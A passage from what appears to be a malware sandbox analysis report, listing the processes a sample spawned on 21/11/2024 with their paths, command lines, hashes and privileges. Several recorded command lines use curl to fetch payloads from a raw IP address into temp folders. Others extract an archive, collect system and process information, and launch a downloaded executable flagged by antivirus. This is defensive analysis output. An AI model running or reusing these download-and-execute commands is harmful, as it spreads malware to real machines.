                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:47
                                        Start time:14:00:19
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:48
                                        Start time:14:00:24
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C cd "C:\Users\user\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:49
                                        Start time:14:00:24
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:50
                                        Start time:14:00:24
                                        Start date:21/11/2024
                                        Path:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                        Wow64 process (32bit):true
                                        Commandline:azvw.exe -o xhwq.zip
                                        Imagebase:0x400000
                                        File size:167'936 bytes
                                        MD5 hash:75375C22C72F1BEB76BEA39C22A1ED68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        Has exited:true

                                        Target ID:51
                                        Start time:14:00:25
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:52
                                        Start time:14:00:25
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:53
                                        Start time:14:00:25
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:54
                                        Start time:14:00:26
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:55
                                        Start time:14:00:26
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:56
                                        Start time:14:00:26
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:57
                                        Start time:14:00:28
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:58
                                        Start time:14:00:28
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:59
                                        Start time:14:00:28
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\systeminfo.exe
                                        Wow64 process (32bit):true
                                        Commandline:systeminfo
                                        Imagebase:0xdd0000
                                        File size:76'800 bytes
                                        MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:60
                                        Start time:14:00:28
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr /C:"OS Name"
                                        Imagebase:0x4f0000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:61
                                        Start time:14:00:28
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                        Imagebase:0xda0000
                                        File size:418'304 bytes
                                        MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:62
                                        Start time:14:00:31
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:63
                                        Start time:14:00:31
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:64
                                        Start time:14:00:31
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:65
                                        Start time:14:00:34
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:66
                                        Start time:14:00:34
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:67
                                        Start time:14:00:34
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:68
                                        Start time:14:00:36
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:69
                                        Start time:14:00:36
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:70
                                        Start time:14:00:36
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:71
                                        Start time:14:00:37
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:72
                                        Start time:14:00:38
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:73
                                        Start time:14:00:38
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:74
                                        Start time:14:00:39
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:75
                                        Start time:14:00:39
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:76
                                        Start time:14:00:39
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:77
                                        Start time:14:00:41
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:78
                                        Start time:14:00:41
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:79
                                        Start time:14:00:41
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:80
                                        Start time:14:00:43
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:81
                                        Start time:14:00:43
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:82
                                        Start time:14:00:43
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:83
                                        Start time:14:00:45
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:84
                                        Start time:14:00:45
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:85
                                        Start time:14:00:45
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:86
                                        Start time:14:00:51
                                        Start date:21/11/2024
                                        Path:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\temp\RevenueDevices.exe"
                                        Imagebase:0x400000
                                        File size:1'151'988 bytes
                                        MD5 hash:B487B5B51436B42576D60A1FE58F8399
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 58%, ReversingLabs
                                        Has exited:true

                                        Target ID:87
                                        Start time:14:00:51
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:88
                                        Start time:14:00:51
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6eef20000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:89
                                        Start time:14:00:53
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:90
                                        Start time:14:00:53
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:91
                                        Start time:14:00:54
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:92
                                        Start time:14:00:55
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:93
                                        Start time:14:00:55
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:94
                                        Start time:14:00:55
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:95
                                        Start time:14:00:57
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:96
                                        Start time:14:00:57
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:97
                                        Start time:14:00:57
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:98
                                        Start time:14:00:57
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist
                                        Imagebase:0xc70000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:126
                                        Start time:14:01:10
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:141
                                        Start time:14:01:18
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:153
                                        Start time:14:01:21
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:195
                                        Start time:14:01:36
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:219
                                        Start time:14:01:44
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:222
                                        Start time:14:01:44
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:240
                                        Start time:14:01:47
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
